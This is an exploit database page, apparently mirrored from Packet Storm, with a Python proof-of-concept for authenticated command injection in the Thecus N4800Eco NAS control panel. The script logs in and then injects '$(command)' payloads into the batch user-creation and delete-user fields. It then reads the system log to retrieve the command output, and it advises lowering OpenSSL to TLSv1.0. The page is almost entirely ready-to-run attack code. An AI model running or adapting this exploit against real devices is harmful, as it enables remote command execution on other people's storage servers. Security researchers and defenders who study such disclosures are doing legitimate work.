Share
## https://sploitus.com/exploit?id=PACKETSTORM:162917
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection  
# Date: 01/06/2021  
# Exploit Author: Metin Yunus Kandemir  
# Vendor Homepage: http://www.thecus.com/  
# Software Link: http://www.thecus.com/product.php?PROD_ID=83  
# Version: N4800Eco  
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection  
  
  
#!/usr/bin/python3  
import requests  
import sys  
import urllib3  
  
  
# To fix SSL error that occurs when the script is started.  
# 1- Open /etc/ssl/openssl.cnf file  
# At the bottom of the file:  
# [system_default_sect]  
# MinProtocol = TLSv1.2  
# CipherString = DEFAULT@SECLEVEL=2  
# 2- Set value of MinProtocol as TLSv1.0  
  
  
def readResult(s, target):  
d = {  
"fun": "setlog",  
"action": "query",  
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'  
}  
url = "http://" + target + "/adm/setmain.php"  
resultReq = s.post(url, data=d, verify=False)  
dict = resultReq.text.split()  
print("[+] Reading system log...\n")  
print(dict[5:8]) #change this range to read whole output of the command  
  
def delUser(s, target, command):  
d = {  
"action": "delete",  
"username": "$("+command+")"  
}  
url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"  
delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)  
  
if 'Local User remove succeeds' in delUserReq.text:  
print('[+] %s command was executed successfully' % command)  
else:  
print('[-] %s command was not executed!' %command)  
sys.exit(1)  
readResult(s, target)  
  
def addUser(s, target, command):  
d = {'batch_content': '%24('+command+')%2C22222%2C9999'}  
url = "http://" + target + "/adm/setmain.php?fun=setbatch"  
addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)  
  
if 'Users and groups were created successfully.' in addUserReq.text:  
print('[+] Users and groups were created successfully')  
else:  
print('[-] Users and groups were not created')  
sys.exit(1)  
delUser(s, target, command)  
  
def login(target, username, password, command=None):  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
s = requests.Session()  
d = {  
"&eplang": "english",  
"p_pass": password,  
"p_user": username,  
"username": username,  
"pwd": password,  
"action": "login",  
"option": "com_extplorer"  
}  
url = "http://" + target + "/adm/login.php"  
loginReq = s.post(url, data=d, allow_redirects=False, verify=False)  
  
if '"success":true' in loginReq.text:  
print('[+] Authentication successful')  
elif '"success":false' in loginReq.text:  
print('[-] Authentication failed!')  
sys.exit(1)  
else:  
print('[-] Something went wrong!')  
sys.exit(1)  
addUser(s, target, command)  
  
def main(args):  
if len(args) != 5:  
print("usage: %s targetIp:port username password command" % (args[0]))  
print("Example 192.168.1.13:80 admin admin id")  
sys.exit(1)  
login(target=args[1], username=args[2], password=args[3], command=args[4])  
  
  
if __name__ == "__main__":  
main(args=sys.argv)